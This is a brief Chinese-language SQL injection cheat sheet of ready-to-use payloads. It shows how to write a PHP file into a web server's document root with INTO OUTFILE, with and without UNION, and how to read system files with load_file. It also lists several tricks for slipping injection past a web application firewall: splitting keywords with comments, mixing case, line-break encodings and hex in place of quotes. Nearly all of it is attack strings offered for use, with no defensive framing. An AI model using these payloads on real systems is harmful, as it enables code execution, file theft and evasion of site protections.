正文

組合技能 SQL Injection – RCE and LFI

• 寫檔案
  • Using union
    • 1 union select 1,2,3,4,5,"<? phpinfo(); ?>" into outfile "/var/www/html/test.php"
  • no union
    • 1 into outfile '/var/www/html/test.php" fields terminated by "<? phpinfo(); ?>"
• 讀取檔案
  • union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6

SQLi Bypass WAF

• owasp
  • 空白繞過的方法
    • /?id=1+un/**/ion+sel/**/ect+1,2,3--
    • +UnIOn%0d%0aSeleCt%0d%0a
    • /?id=(1)or(0x50=0x50)
  • 引號
    • concat(0x223e,@@version)